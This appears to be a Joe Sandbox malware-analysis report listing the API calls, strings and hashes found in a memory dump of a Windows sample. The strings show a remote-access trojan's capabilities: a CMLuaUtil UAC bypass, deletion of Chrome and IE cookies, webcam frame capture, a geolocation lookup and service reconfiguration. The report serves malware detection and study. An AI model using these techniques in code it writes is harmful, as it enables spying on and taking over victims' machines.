                                                  • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                  • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                  • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                  APIs
                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                  • API String ID: 1133728706-4073444585
                                                  • Opcode ID: e02571ccf1d8d7642eb7522d4ecac0f64e4039cdab1393baceb5a006cb27889d
                                                  • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                  • Opcode Fuzzy Hash: e02571ccf1d8d7642eb7522d4ecac0f64e4039cdab1393baceb5a006cb27889d
                                                  • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                  • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                  APIs
                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                  Strings
                                                  • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                  • String ID: http://geoplugin.net/json.gp
                                                  • API String ID: 3121278467-91888290
                                                  • Opcode ID: ab2cbc20b1a026a18eeb93cbadf4ab6921f31ebf631c8869f851e8b96143ecd1
                                                  • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                  • Opcode Fuzzy Hash: ab2cbc20b1a026a18eeb93cbadf4ab6921f31ebf631c8869f851e8b96143ecd1
                                                  • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                  APIs
                                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                  • _free.LIBCMT ref: 00450FC8
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00450FD3
                                                  • _free.LIBCMT ref: 00450FDE
                                                  • _free.LIBCMT ref: 00451032
                                                  • _free.LIBCMT ref: 0045103D
                                                  • _free.LIBCMT ref: 00451048
                                                  • _free.LIBCMT ref: 00451053
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                  • int.LIBCPMT ref: 004111BE
                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: (mG
                                                  • API String ID: 2536120697-4059303827
                                                  • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                  • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                  • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                  • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                  • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                  • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                  • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                  APIs
                                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\FPPhfkcDCh.exe), ref: 0040760B
                                                    • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                    • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                  • CoUninitialize.OLE32 ref: 00407664
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                  • String ID: C:\Users\user\Desktop\FPPhfkcDCh.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                  • API String ID: 3851391207-2562792606
                                                  • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                  • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                  • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                  • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                  • GetLastError.KERNEL32 ref: 0040BB22
                                                  Strings
                                                  • [Chrome Cookies not found], xrefs: 0040BB3C
                                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                  • UserProfile, xrefs: 0040BAE8
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                  • API String ID: 2018770650-304995407
                                                  • Opcode ID: 40cbd1d017226246a01c6e55be9682f761922b1e96e2188b9bd7b4daff8d9f2f
                                                  • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                  • Opcode Fuzzy Hash: 40cbd1d017226246a01c6e55be9682f761922b1e96e2188b9bd7b4daff8d9f2f
                                                  • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                  APIs
                                                  • _free.LIBCMT ref: 00444106
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00444118
                                                  • _free.LIBCMT ref: 0044412B
                                                  • _free.LIBCMT ref: 0044413C
                                                  • _free.LIBCMT ref: 0044414D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID: hOl
                                                  • API String ID: 776569668-2321562931
                                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                  • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                  • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                  APIs
                                                  • __allrem.LIBCMT ref: 0043ACE9
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                  • __allrem.LIBCMT ref: 0043AD1C
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                  • __allrem.LIBCMT ref: 0043AD51
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                  • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                  • Opcode Fuzzy Hash: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                  • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prologSleep
                                                  • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                  • API String ID: 3469354165-3054508432
                                                  • Opcode ID: fbbb70fae617f0e17399e9119777e289a0bc6f613e5ac53b3207e25997d7ebef
                                                  • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                  • Opcode Fuzzy Hash: fbbb70fae617f0e17399e9119777e289a0bc6f613e5ac53b3207e25997d7ebef
                                                  • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                  APIs
                                                    • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                  • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                  • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                    • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                    • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                    • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                  • String ID:
                                                  • API String ID: 3950776272-0
                                                  • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                  • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                  • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                  • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __cftoe
                                                  • String ID:
                                                  • API String ID: 4189289331-0
                                                  • Opcode ID: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                  • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                  • Opcode Fuzzy Hash: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                  • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                  • String ID:
                                                  • API String ID: 493672254-0
                                                  • Opcode ID: 465ab7c2e076ec59a8d270df8ce72ad0174e5281a4bfe7e39c5caa5367581a5e
                                                  • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                  • Opcode Fuzzy Hash: 465ab7c2e076ec59a8d270df8ce72ad0174e5281a4bfe7e39c5caa5367581a5e
                                                  • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                  APIs
                                                  • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • _free.LIBCMT ref: 004482CC
                                                  • _free.LIBCMT ref: 004482F4
                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • _abort.LIBCMT ref: 00448313
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
